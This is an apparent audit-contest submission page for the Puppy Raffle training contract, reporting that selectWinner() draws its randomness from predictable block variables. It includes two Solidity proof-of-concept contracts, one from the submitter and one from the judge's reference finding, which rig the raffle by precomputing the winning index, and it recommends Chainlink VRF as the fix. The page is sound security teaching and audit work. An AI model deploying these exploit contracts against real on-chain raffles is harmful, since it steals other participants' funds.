Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

`selectWinner()` Uses Predictable Block Variables as Randomness Source — Deterministic Winner and Rarity Manipulation

h3xu

selectWinner() Uses Predictable Block Variables as Randomness Source — Deterministic Winner and Rarity Manipulation

Description

PuppyRaffle.selectWinner() determines the raffle winner index and the NFT rarity tier using a keccak256 hash of msg.sender, block.timestamp, and block.difficulty. These values are all known or controllable by miners and any observer before the winning transaction is mined, making the outcome deterministic from an attacker's perspective.

Any smart contract can simulate the same computation off-chain (or on-chain in the same transaction) before calling selectWinner(), then selectively include the call only when the computed index matches a target player or rarity tier they control.

function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "...");
require(players.length >= 4, "...");
@> uint256 winnerIndex =
@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];
// ...
@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;
}

Risk

Likelihood: High

  • The attack requires only the ability to submit transactions — any EOA or miner can execute it without any special privileges.

  • Block timestamp is miner-malleable within ~15 seconds; miners with hash power can also choose block.difficulty.

  • An attacker who is NOT a miner can still precompute the result for the current block and choose whether to call selectWinner() based on whether they win.

Impact: High

  • Attacker guarantees they (or a chosen address) wins the prize pool every round, stealing funds from all other participants.

  • Attacker also controls which NFT rarity tier is minted, extracting maximum value from the NFT mechanism.

Severity: High

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
interface IPuppyRaffle {
function selectWinner() external;
function players(uint256) external view returns (address);
function entranceFee() external view returns (uint256);
function enterRaffle(address[] memory newPlayers) external payable;
}
contract SelectWinnerAttack {
IPuppyRaffle public target;
uint256 public attackerIndex;
constructor(address _target) {
target = IPuppyRaffle(_target);
}
function trySelectWinner() external {
uint256 nPlayers = 10; // known off-chain
// Simulate the winning index for THIS block
uint256 simulatedWinner = uint256(
keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))
) % nPlayers;
// Only call selectWinner when we would win
require(simulatedWinner == attackerIndex, "Not winning this block — wait");
target.selectWinner();
}
}

Expected outcome: The attacker calls trySelectWinner() repeatedly across different blocks until the precomputed index matches their player slot, guaranteeing a win.

Recommended Mitigation

Use a verifiable on-chain randomness source such as Chainlink VRF v2. Replace the current entropy derivation entirely:

- uint256 winnerIndex =
- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
+ // Chainlink VRF v2 — request randomness off-chain, handle fulfillment in callback
+ // See: https://docs.chain.link/vrf/v2/subscription/examples/get-a-random-number
+ uint256 winnerIndex = s_randomWords[0] % players.length;

As an interim measure, commit-reveal schemes reduce the attack window but do not eliminate miner manipulation. On post-Merge Ethereum, block.difficulty is replaced by block.prevrandao which has slightly better properties but is still manipulable by validators.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 5 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!